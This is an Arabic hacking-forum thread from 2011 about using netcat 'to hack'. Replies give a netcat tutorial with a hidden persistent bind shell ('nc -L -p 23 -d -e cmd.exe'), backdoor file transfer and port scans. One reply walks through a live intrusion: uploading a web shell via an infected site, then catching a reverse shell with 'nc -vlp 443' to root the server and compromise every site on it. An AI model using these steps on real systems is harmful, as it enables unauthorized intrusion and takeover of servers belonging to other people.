:: vBspiders Professional Network ::

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)
-   جـــ'ابات العناكــ'ب (http://www.vbspiders.com/vb/f343.html)
-   -   netcat (http://www.vbspiders.com/vb/t43941.html)

kalachnikov hacker 03-01-2011 10:11 PM
netcat
 
السلآم عليكم
ما هو netcat
و كيف يتم الإختراق به
+ إن كآن ممكن شرح الإختراق به ...

المفترس 03-02-2011 12:15 PM
النت كات هو عبارة عن برنامج يعمل في بيئة الدوس يسمح لك بعمل اتصال عكسي او مباشر مع السيرفر ويستخدم بكترة
لاخد الرووت على السيرفر او لفحص البورتات المفتوحة فيه

الرووت صلاحية في نظام اللينوكس تسمح لك بالتحكم في جميع ملفات والقيام بجميع العمليات من اعادة تسمية الملفات ونسخ وحدف ومشاهدة وتعديل لملفات
الدوس هدا نظام صغيرمدموج مع النظام الاساسي ويمكنك الدخول عليه من
ابدا
تشغيل
اكتب cmd
وسيظهر لك
البورتات منافد الاتصال في جهاز تخيلهم كانهم نوافد تدخل منهم المعلومات الى جهاز القادمة من جهاز اخر متصل


اما الاختراق به فهدا يحتاج فيديو بكامل ابحت في قوقل وان شاء الله تجد

وبالتوفيق

NeTCaT-Ma 03-02-2011 03:20 PM
وهدا هو النت كات
http://www.multiupload.com/H13N5SMEQZ
ضع مجلد netcat إن كان لديك الوندوز في c:\
يمكنك تشغيله هكدا
إبدأ
run
cmd
أكتب cd netcat للدخول للمجلد
من بعد nc.exe
وها أنت دخلت إلى النت كات

loulou 03-02-2011 03:53 PM
تمام م قصرو معك الاخوة

kalachnikov hacker 03-02-2011 04:30 PM
الله يعطيكم العافية
تحياتي لكم

kalachnikov hacker 03-02-2011 04:32 PM
إن أكمن ذلك فيديو أو موضوع شآمل له ؟

loulou 03-02-2011 04:42 PM
اقتباس:
Netcat هي اداة سطر اوامر تعطيك تحكم كامل ل Socket دون معرفة مسبقبة باي لغة برمجية او حثى winsock كما يمكنك دمجها مع سكريبتات ك batch script

Netcat client
تسمح لك Netcat بفتح اتصال نحو اي سرفر تريد بالامر nc AdressIp 23 بتحديد ip او domaine و بور الاتصال
كل ما ستكتب على لوحة المفاتيح سوف يرسل الى السرفر مباشرة
قد تتسائل مع نفسك كيف تتعرف Netcat على البرتكول المستعمل, Netcat تستطيع فعل ما تريد ب Socket بصورة نصية ماذا يعني هذا الكلام ? يعني ان Netcat لا تعرف protocole المستعمل في الاتصال انما ترسل الامر كما لو انه جملة عادية. قد يتسائل بعضكم ان telnet المغفل الويندوز تقم بنفس الدور و هنا الخطاء تابع الدرس و ستتعرف على الفرق
بما اننا تحدثنا عن telnet فان Netcat تقوم بنفس الدور من خلال الامر nc -t AdresseIp 23

Netcat server
تطرقنا إلى Netcat في در العميل بخلاصة شديدة و الآن دورها و هي سرفر
نقوم بالتنصت على بورت معين ننفذ الأمر : nc -l -p 23
-l : إعطاء أمر ل Netcat لتنصت على بورت معين
-p : تحديد بورت التنصت

عند تنفذ الأمر قد تقول أنNetcat قد علقت لا أخي إنما هي تنتظر استقبال اي إتصال على البورت الذي حددته
الآن بواسطة عميل telnet نقوم بإجراء إتصال على جهازنا على البورت الذي حددناه سابقا لتأكد من عمل السرفر الذي صنعناه
telnet 127.0.0.1
نلاحظ أن عميل telnet قد إتصل بنجاح على سرفرنا الان نكتب اي شيء في Natcat و المفاجأة كل ما كتبته في Netcat يظهر في عميل telnet كأنك أمام msn في الدوس او ****************l console
الآن نقوم بإغلاق عميل telnet و ينقطع الإتصال في Netcat و يغلق البورت المفتوح من طرفها

لهدا المشكل حل في Netcat أي عند قطع الإتصال من العميل في مثالنا هنا هو telnet لن تقوم بإغلاق البورت بمعنى أوضح البورت سيبقى دائما مفتوح
nc -L -p 23
هذه المرة L كبيرة لنقول ل netcat ان لا يغلق البورت عند قطع الإتصال من العميل

كما يمكن أن نجعل سرفرنا أكثر إحترافية بوضع رسالة ترحيب للعميل المتصل كيف ذالك تابع معي
قم بإنشاء ملف بأي اسم تريد في نفس مسار Netcat وأكتب فيه رسالة الترحيب وقم بتعديل أمر التصت لما يلي
nc -L -p 23 < msg.txt
وقم بعمل إتصال جديد بأي عميل telnet تريد لتتأكد من صحة كلامي

الآن سنقوم بصنع نظام Log file لسرفرنا بتعبير أكثر دقة تسجيل كل ما يدور أثناء الإتصال في ملف Log
nc -L -p 23 > Logfile.log
وقم بعمل إتصال جديد بأي عميل telnet تريد لتتأكد من صحة كلامي مرة أخرى

نقل الملفات من جهاز لآخر عن طريق Netcat
بإستعمال الأمريين السابقين واحد في جهاز المرسل ( nc -L -p 23 < backdoor.exe ) و الاخر في جهاز المستقبل( nc -L -p 23 > backdoor.exe)

Netcat لا تسمح لنا فقط بتحويل كل ما يدور اثناء الإتصال إلى ملف بل إلى برنامج أيضا سأستخدم في شرحي cmd.exe لنظام الويندوز لصنع Remote ****************l تابع معي الشرح

nc -L -p 23 -e cmd.exe
ومن أجل التأكد من صحة ما أقول قم بتشغيل اي عميل telnet تريد و قم بإجراء إتصال على سرفرنا على البورت الدي فتحته وها سطر الأوامر يظهر لك عليك
بواسطة هذا الإختيار تستطيع صنع برنامج يعمل على Socket دون معرفة مسبقة به.

هناك الخيار -d آخر مهم يعمل فقط في الويندوز و هو فك Netcat عن الدوس بمعنى أدق عند إغلاق الدوس في الويندز مثلا تبقى Netcatشغالة في process فبدون هذا الخيار عند إغلاق الدوس سيتوقف سرفرنا عن العمل
nc -L -p 23 -d -e cmd.exe
نفذ لأمر و قم بإغلاق الدوس و شوف Netcat ليسا شغالة في process وقم بعمل إتصال جديد بأي عميل telnet تريد لتتأكد من صحة


Netcat Hacking
يقال أن Netcat تستطيع فعل أي شيء ب Sockets .
Netcat تتوفر على أختيارات عدة متوجهة لسكان, يستعمل السكان لمعرفة الفنافد المفتوحة و الخدمات التي تعمل على السرفر او الجهاز
لإجراء سكان بواسطة Netcat تابع الشرح

nc -vv google.com 1-100
هذا الأمر سيعمل سكان على المنافذ من 1 إلى 100
عند تنفذ أمر السكان ، تظهر لك Netcat رسال تخبرك بحالة المنافذ refused للمنافيذ المغلقة و Open للناذ المفتوحة. أشير أيضا أن Netcat تعمل سكان من الأعلى إلى الأسفل كما توفر لك أخي Netcat خيار -r لعل سكان عشوائي
nc -vv -r google.com 100-110

Netcat ليست محدودة فهي توفر لك مجموعة من الخيارات تسهل عليك الأمر
nc -vv -r google.com 1-1024 4900-5000 6667

في حالة تعرفNetcat على منفذ مفتوح تقف عنده و يتمم الإتصال وبالتالي توقف السكان لحل هذا المشكل توفر لك Netcat خيار -z لإتمام السكان رغم تعرفا على منافذ مفتوحة
nc -vv -r -z google.com 130-140

فتح إتصال نحوي سرفر بتحديد منافذ التصال لطرفين
nc -p 65000 google.com 6667

تمنحك Netcat خيار -u لصنع Socket UDP و تستعمل لسكان UDP
هناك خيار آخر -w لتحديد المدة التي تبقي Netcat تنتظر الإتصال (time-out)
nc -w 5 google.com 23
و من هنا تستطيع تحميل الاداة

http://www.mediafire.com/?ryyzje0ewzk

اطلب منك لا الدعاء لي و لوالداي فقط

سلام

kalachnikov hacker 03-02-2011 04:52 PM
هل يجب أن يكون شل مرفوع على السرفر للإخترآق ؟

Dr.NaNo 03-03-2011 01:53 AM
اقتباس:
المشاركة الأصلية كتبت بواسطة kalachnikov hacker (المشاركة 308058)
هل يجب أن يكون شل مرفوع على السرفر للإخترآق ؟
نعم اخي العزيز .

ويجب ان يكون الشل الذي مرفوع على السيرفر به امر الاتصال العكسي يعني في بعض الشلات يكون تحت بالنهاية مكتوب للإتصال العكسي وبعضها لا يوجد او بعضها تتطرق لتنفيذ اوامر في الشل command لكي يتم الاتصال العكسي بينك وبين السيرفر..

وملاحظـة .:

الشل انت ترفعه من خلال احد المواقع المصابه التي على السيرفر. يعني لو في موقع مصاب على السيرفر ارفع شل من هناك وبعد الرفع افتح بورت 443 او اي بورت في المودك تبعكـ لكي يتم الاتصال العكسي . ثم لـ أداءة النت كات وادخل على مسارها من شاشه الدوس وشغلها ونفذ الامر .:

nc -vlp 443

يكي يبدا التنصت على البورت 443 ويمكنك تغير البورت الى اي بورت تريده لكن هذا الافضل يتم الاتصال بشكل ممتاز..

وبعد ان يتم التنصت إذهب الى الشل الي مرفوع على الموقع المصاب ومن هناك تجد تحت مكتوب للإتصالات العكسية لو انت رافع شل . سنايبر او شل r75.php او احد الشلات راح تجد تحت بنهاية الشل .منافذ الاتصال العكسي وتجد بين المنافذ الاي بي تبعك تبع الاتصال وبورت غير البورت الى البورت المفتوح في مودمك ومثلا هو 443 وتحت تجد خيار perl و c انت ضعه perl نفس ماهو .. ثم اضغط على اتصال ..

واذهب الى شاشه النت كات او الدوس وسوف تجد انه تم الاتصال بالسيرفر.

ثم نفذ في شاشه الدوس اوامر الشل id و pwd و uname -a و ..الخ من الاوامر.

وسترى انه تم التنفيذ ويمكنك استعراض الملفات وكل شي نفس طريقة الشل بالضبط ..

لكن الفائدة من الاتصال العكسي هو تخطي الحماية السيف مود او لترويت السيرفر لكي يتم إختراق جميع مواقع السيرفر او .. الخ.

هذه الفائدة من النت كات .وهو يستخدم كثيرآ جدآ..



وانا انصحكـ تتابع هذا الموضوع .:

http://www.vbspiders.com/vb/t25439.html





وفي أمان الله.
Dr.NaNo

kalachnikov hacker 03-03-2011 02:34 AM
بارك الله فيك على الشرح
أشكرك كثير الشكر
و أشكر جميع الإخوآن المساعدين !!

kalachnikov hacker 03-03-2011 02:39 AM
لدي استفسآر آخر ( آسف أكثرت عليكم)
أريد العمل بـNmap لكن عند فحص موقع يدليني بخطأ مفاده أنه تمت محاولة اتصال ممنوعة sockets
نظامي Win 7

shadow1 09-16-2013 11:03 AM
رد: netcat
 
لا اله الا الله محمد رسول الله :)

هاوي هكر11 11-24-2013 05:52 AM
رد: netcat
 
شكرا لك

يعطيك العافية


الساعة الآن 11:26 PM


[ vBspiders.Com Network ]


SEO by vBSEO 3.6.0